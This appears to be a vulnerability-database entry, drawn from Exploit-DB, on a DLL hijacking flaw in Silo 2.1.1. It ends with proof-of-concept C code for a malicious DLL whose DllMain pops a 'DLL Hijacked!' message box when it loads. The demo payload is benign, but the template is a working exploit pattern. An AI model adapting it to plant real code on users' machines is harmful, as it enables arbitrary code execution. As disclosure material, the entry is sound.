Arbitrary Code Execution in Silo

vendor:

Silo

by:

Unknown

7.5

CVSS

HIGH

Arbitrary Code Execution

Unknown

CWE

Product Name: Silo

Affected Version From: Silo 2.1.1

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

Arbitrary Code Execution in Silo

The Silo application is vulnerable to an arbitrary code execution vulnerability. This can be exploited by an attacker by tricking a legitimate user into using the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. When the DLL file is loaded, the attacker's code is executed.

Mitigation:

Unknown

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/44726/info

Silo is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Silo 2.1.1 is vulnerable; other versions may also be affected. 

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}